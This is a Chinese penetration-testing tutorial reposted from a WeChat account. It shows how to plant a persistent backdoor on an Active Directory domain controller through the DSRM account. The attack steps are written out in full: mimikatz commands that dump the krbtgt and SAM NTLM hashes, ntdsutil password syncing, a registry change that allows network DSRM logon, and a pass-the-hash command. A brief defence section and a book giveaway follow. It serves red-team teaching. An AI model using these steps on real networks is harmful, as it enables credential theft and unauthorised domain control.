【福利】内网域渗透 | 域控权限维持DSRM域后门

admin 2023年1月30日19:52:02评论76 views字数 2764阅读9分12秒阅读模式

 

【福利】内网域渗透 | 域控权限维持DSRM域后门


0x01 前言


【福利】内网域渗透 | 域控权限维持DSRM域后门

    DSRM (Directory Services Restore Mode, 目录服务恢复模式)是 Windows 域环境中域控制器的安全模式启动选项。每个域控制器都有一个本地管理员账户(也就是 DSRM 账户)。DSRM 的用途是:允许管理员在域环境中出现故障或崩溃时还原、修复、重建活动目录数据库,使域环境的运行恢复正常。在域环境创建初期,DSRM 的密码需要在安装 DC 时设置,且很少会被重置修改 DSRM 密码最基本的方法是在 DC 上运行 ntdsutil 命令行工具。

【福利】内网域渗透 | 域控权限维持DSRM域后门
【福利】内网域渗透 | 域控权限维持DSRM域后门

    在实战中,可以使用DSRM 账号对域环境进行持久化操作。如果域控制器的系统版本为Windows Server 2008,需要安装 KB961320 才可以使用指定域账号的密码对 DSRM 的密码进行同步。在 Windows Server 2008 以后版本的系统中不需要安装此补丁。DSRM 账号可以作为一个域控制器的本地管理员用户,通过网络连接蜮控制器,进而控制域控制器。

【福利】内网域渗透 | 域控权限维持DSRM域后门

 


0x02 利用前提


 


使用DSRM账户连接的前提


【福利】内网域渗透 | 域控权限维持DSRM域后门
【福利】内网域渗透 | 域控权限维持DSRM域后门

(1)系统要求:在安装了KB961320补丁的Windows Server 2008及之后的Windows Server版本开始支持在DC上使用指定的域帐户同步DSRM密码

(2)更改DSRM的密码方式:同步域用户的方式

(3)开启支持DSRM账户网络连接:需要修改注册表项,默认没有改项

【福利】内网域渗透 | 域控权限维持DSRM域后门
注册表命令:reg add "HKLMSystemCurrentControlSetControlLsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2powershell命令:New-ItemProperty "hklm:systemcurrentcontrolsetcontrollsa" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD


【福利】内网域渗透 | 域控权限维持DSRM域后门

(4)需要一个域账户的hash

(5)并且需要注意是否会同步域账户(同步dsrm账户后,后门即失效)                 

(6)域控重启后会失效

【福利】内网域渗透 | 域控权限维持DSRM域后门

 


0x03 实操


 


获取Krbtgt的NTLM Hash


【福利】内网域渗透 | 域控权限维持DSRM域后门

privilege::debuglsadump::lsa /patch /name:krbtgt

【福利】内网域渗透 | 域控权限维持DSRM域后门



在域控中利用mimikatz查看并读取SAM文件中本地管理员的NTLM Hash

【福利】内网域渗透 | 域控权限维持DSRM域后门
token::elevatelsadump::sam

获取DSRM账号的NTLM Hash

【福利】内网域渗透 | 域控权限维持DSRM域后门


【福利】内网域渗透 | 域控权限维持DSRM域后门

修改/同步DSRM密码

【福利】内网域渗透 | 域控权限维持DSRM域后门

• NTDSUTIL:打开ntdsutil.set dsrm password:设置 DSRM 的密码。reset password on server null:在当前域控制器上恢复 DSRM 密码。• <PASSWORD>:修改后的密码。•q(第1次):退出 DSRM 密码设置模式。•q(第2次):退出 ndsutilo
【福利】内网域渗透 | 域控权限维持DSRM域后门

如果域控的系统版本为 Windows Server 2008(已安装 KB961320)及以上,可以将 DSRM密码同步为己存在的城账号密码。

【福利】内网域渗透 | 域控权限维持DSRM域后门

 

•NTDSUTIL:打开 ntdsutilo• SET DSRM PASSWORD:设置 DSRM的密码• SYNC FROM DOMAIN ACCOUNT domainusemame:使 DSRM 的密码和指定域用户的密码同步•重置DSRM 管理员密码:q• ntdsutl:q



DSRM账号和krbtgt的NTLM Hash同步

【福利】内网域渗透 | 域控权限维持DSRM域后门

【福利】内网域渗透 | 域控权限维持DSRM域后门



查看DSRM的NTLM Hash是否同步成功

【福利】内网域渗透 | 域控权限维持DSRM域后门

【福利】内网域渗透 | 域控权限维持DSRM域后门


修改DSRM登录方式

【福利】内网域渗透 | 域控权限维持DSRM域后门

0:默认值,只有当域控制器重启并进人DSRM 模式时,才可以使用 DSRM 管理员账号。1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM管理员账号登录域控制器。2:在任何情况下,都可以使用 DSRM管理员账号登录域控制器。

在实战中,需要注意在 Windows Server 2000 以后版本的操作系统中,对DSRM 使用控制台登录域控进行了限制。如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为2。我这里演示用PowerShell进行修改

【福利】内网域渗透 | 域控权限维持DSRM域后门
New-ItemProperty "hklm:systemcurrentcontrolsetcontrollsa" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD

【福利】内网域渗透 | 域控权限维持DSRM域后门


 

【福利】内网域渗透 | 域控权限维持DSRM域后门

使用DSRM账号访问域控

在域成员机器上就可以通过mimikatz,使用域控的本地Administrator账号哈希传递攻击域控了‍。

 

sekurlsa::pth /domain:OWA2010SP3 /user:administrator /ntlm:a3490225625b7bcb900495ca1d43913e

【福利】内网域渗透 | 域控权限维持DSRM域后门

注意,在这里,/domain 选项不是填写域名!而是域控的机器名(OWA2010SP3)一定要注意!

下图是个错误的演示

【福利】内网域渗透 | 域控权限维持DSRM域后门


【福利】内网域渗透 | 域控权限维持DSRM域后门

利用DSRM账号访问域控,使用dcsync功能远程转储krbtgt的NTLM Hash


【福利】内网域渗透 | 域控权限维持DSRM域后门



0x04 防御措施


定期检查注册表中用于控制 DSRM 登录方式的键值 HIKLMSystem CurrentContro Set Control Lsa DsrmAdminLogonBehavior,确认该键值为 1,或者删除该键值定期修改域中所有域控制器的 DSRM 账号。经常检查 DD 为 4794 的日志。尝试设置活动目录服务还原模式的管理员密码会被记录在4794 日志中

福利抽奖环节 

【福利】内网域渗透 | 域控权限维持DSRM域后门

内容简介:

我们都生活在移动互联网时代,个人信息、企业信息、政府信息都暴露在互联网之下。一旦有居心叵测的人攻破网络,会造成无法估量的损失。《Web安全攻防从入门到精通》结合红日安全团队的多年经验,深入讲解Web安全的相关知识。

全书共有21个章节,第1章到第6章讲解Web攻防入门知识,包括HTTP基本概念、工具实战、信息收集、靶场搭建等内容;第7章到第20章讲解Web渗透测试的14个典型漏洞案例,包括SQL注入、XSS漏洞、CSRF漏洞、SSRF漏洞、任意文件上传、业务漏洞等内容;第21章是项目实战,主要模拟真实Web安全评估项目。



1. 开奖时间:10月17日12:00

2. 活动规则:

① 注意点击下方名片发暗号"抽奖"

① 注意点击下方名片发暗号"抽奖"

① 注意点击下方名片发暗号"抽奖"

或扫码参与即可【福利】内网域渗透 | 域控权限维持DSRM域后门

② 必要条件:开奖前转发本文到朋友圈,开奖前不可删除

③ 开奖结束后,请中奖小伙伴及时将中奖信息和朋友圈转发记录发送到微信:BCathack超过24小时未领取的视为自动放弃哈!!!

未满足条件但被抽中,则获奖资格会被取消哦【福利】内网域渗透 | 域控权限维持DSRM域后门

【福利】内网域渗透 | 域控权限维持DSRM域后门




坚持学习与分享!走过路过点个"在看",不会错过【福利】内网域渗透 | 域控权限维持DSRM域后门

仅用于学习交流,不得用于非法用途

如侵权请私聊公众号删文

推荐阅读


↓↓↓↓↓↓


原文始发于微信公众号(EchoSec):【福利】内网域渗透 | 域控权限维持DSRM域后门

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月30日19:52:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【福利】内网域渗透 | 域控权限维持DSRM域后门http://cn-sec.com/archives/1351989.html

发表评论

匿名网友 填写信息